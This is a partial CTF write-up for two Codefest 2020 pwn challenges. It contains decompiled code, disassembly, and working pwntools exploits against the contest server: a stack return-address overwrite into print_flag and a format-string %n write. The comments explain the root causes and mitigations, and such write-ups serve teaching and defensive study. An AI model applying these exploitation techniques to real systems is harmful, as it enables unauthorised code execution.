Codefest CTF 2020 (部分wp)


C is hard

➜  ctf21 checksec source_fixed 
[*] '/home/yutian/ctf21/source_fixed'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA

main

// IDA pseudocode for main (decompiler output, not the original source).
// Prints a banner, calls vuln() with the address of one of its own stack
// slots, then prints a second message and returns. The extra argv/envp/v3
// arguments on the puts_0 calls are decompiler noise from unresolved
// register state; puts_0 is an unresolved thunk, presumably puts().
// NOTE(review): nothing visible on this page ever calls print_flag — the
// only path into it is the overwritten return address inside vuln(), which
// the "No canary found" line of the checksec output above leaves undetected.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v5; // [rsp-8h] [rbp-8h]

  __asm { endbr64 }
  puts_0("I will give you my secret if you can run my function", argv, envp);
  vuln((__int64)&v5);   // vuln ignores rdi and sets up its own 0x20-byte buffer (see disassembly)
  puts_0("This is not my function :", argv, v3);
  return 0;
}

vuln

; vuln: reserves a 0x20-byte stack buffer and hands its address to an
; unresolved PLT stub (sub_4010B0) with no length argument. With no stack
; canary (checksec above) an over-long input overruns the buffer, the saved
; rbp at [rbp] and the return address at [rbp+8] without any check firing;
; the return slot is 0x20 + 8 = 0x28 bytes from the buffer start, which is
; the offset the exploit below uses.
.text:000000000040121A                 public vuln
.text:000000000040121A vuln            proc near               ; CODE XREF: main+19↓p
.text:000000000040121A ; __unwind {
.text:000000000040121A                 endbr64
.text:000000000040121E                 push    rbp
.text:000000000040121F                 mov     rbp, rsp
.text:0000000000401222                 sub     rsp, 20h        ; whole frame is the 0x20-byte buffer
.text:0000000000401226                 lea     rax, [rbp-20h]  ; buffer start, directly below saved rbp
.text:000000000040122A                 mov     rdi, rax        ; first arg = buffer; no size is passed
.text:000000000040122D                 mov     eax, 0          ; SysV al=0: callee has no known prototype or is variadic
.text:0000000000401232                 call    sub_4010B0      ; unresolved import; presumably an unbounded read such as gets() — confirm in the PLT
.text:0000000000401237                 nop
.text:0000000000401238                 leave
.text:0000000000401239                 retn                    ; pops whatever now sits at [rbp+8]
.text:0000000000401239 ; } // starts at 40121A
.text:0000000000401239 vuln            endp

print_flag

// IDA pseudocode for print_flag (decompiler output, not the original source).
// Opens "flag.txt", reads up to 64 bytes of it into the global `flag` and
// prints it between ANSI colour escapes. The three sub_* callees are
// unresolved import thunks; from their argument shapes they look like
// fopen / fgets / printf and unk_402008 like the mode string — confirm
// against the PLT. The @<rbp> "argument" and the v3 = a1 copy are
// decompiler artefacts of the frame prologue, not a real parameter.
__int64 __usercall print_flag@<rax>(__int64 a1@<rbp>)
{
  __int64 v1; // ST08_8
  __int64 v3; // [rsp-8h] [rbp-8h]

  __asm { endbr64 }
  v3 = a1;
  v1 = sub_4010C0("flag.txt", &unk_402008);   // presumably fopen("flag.txt", mode)
  sub_4010A0(&flag, 64LL, v1);                // presumably fgets(flag, 64, fp); v1 is used without a NULL check
  return sub_401090(" Thanks for running my function, here is my secret : %s%s%s", "\x1B[38;5;83m", &flag, "\x1B[0m");
}

exp

from pwn import *

# Writeup script for "C is hard": a return-address overwrite through the
# unchecked read in vuln(). Defender's view: the checksec output above shows
# no stack canary and no PIE, which is exactly what makes this work — the
# saved return address can be overwritten silently and print_flag sits at
# a fixed address. Either mitigation alone would have stopped this payload.
#io = process("./source_fixed")
io = remote("chall.codefest.tech", 8782)
# Entry of print_flag. The listings above do not show this address, so it is
# taken from IDA (No PIE => .text addresses are static).
flag_addr = 0x04011B6
# vuln's frame is a 0x20-byte buffer at rbp-0x20 followed by 8 bytes of
# saved rbp, so the return slot is 0x28 bytes in (see `sub rsp, 20h` and
# `lea rax, [rbp-20h]` in the disassembly).
payload = cyclic(0x28) + p64(flag_addr) 

io.recvuntil("I will give you my secret if you can run my function")
io.sendline(payload)

io.interactive()

Take me to a cafe

exp

from pwn import *

# Writeup script for "Take me to a cafe": a format-string write (%n) into a
# 32-bit binary. No disassembly of ./format is shown on this page, so the
# meaning of c_addr and the stack position 4 are inferred from the payload
# only — verify them against the binary before reusing.
# io = process("./format")
io = remote("chall.codefest.tech", 8745)
# context.log_level='debug'

# Presumably the address of the variable the check reads; taken from IDA.
c_addr = 0x0804C044

# p32(c_addr) places the target address on the stack where printf finds it
# as argument 4; '%51962d' pads the output so the character count reaches
# 4 + 51962 = 51966 = 0xCAFE, and '%4$n' stores that count at c_addr.
# Defender's view: the root cause is printf(buf) with attacker-controlled
# buf; printf("%s", buf) (or building with -Wformat-security) removes the
# %n primitive entirely.
payload = p32(c_addr) + b'%51962d' + b'%4$n'
io.sendline(payload)
io.interactive()

